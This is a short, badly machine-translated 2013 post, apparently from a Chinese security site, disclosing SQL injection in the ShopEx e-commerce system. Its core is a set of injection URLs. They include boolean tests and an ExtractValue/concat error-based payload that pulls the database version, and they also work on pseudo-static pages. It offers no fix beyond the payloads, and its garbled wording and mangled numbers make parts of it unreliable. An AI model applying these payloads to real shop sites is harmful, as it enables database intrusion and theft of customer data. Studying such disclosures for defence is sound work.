shopex through the kill injection 0day vulnerabilities two-vulnerability and early warning-the black bar safety net

2013-02-04T00:00:00
ID MYHACK58:62201337144
Type myhack58
Reporter 佚名
Modified 2013-02-04T00:00:00

Description

Injection vulnerabilities are a classic vulnerability type, since the last time with friends deep chat about the injection, I injected the awareness but also enhance a height, in my opinion can not be injected into the place, TMD turned out to be injected, the injection attacks the earliest of the 1 9 9 8 years of, seemingly, remember. 1 0 years, and still exists, although the ratio previously appeared a small amount, but had to use one of the attack techniques...

Okay, I digress~~ In fact, the injection is not only appear in the dynamic page, do the pseudo-static after it can not be injected? NO~ Not ripped, just say theme to it, shopex online shop system injection vulnerabilities. The injection point is as follows:

http://www.x.cn/index.php?comment-822'//and//'1'='1-ask-commentlist.html

http://www.x.com/comment-8967'//and//ExtractValue(0×6 4,concat(0×0 1,(select//@@version)))//order//by//'1-ask-commentlist.html

http://www.x.cn/index.php?comment-822'//and//'1'='1-ask-commentlist.html

http://demo.x.com.cn/485/index.php?comment-190'//and//'1'='1-ask-commentlist.html

A is a site not to open the pseudo-static of injection, a is website on pseudo-static post-injection, and whether to shield error echo 2X2=4 Case. How the injection is not to say, 1 0 years of stuff...not will...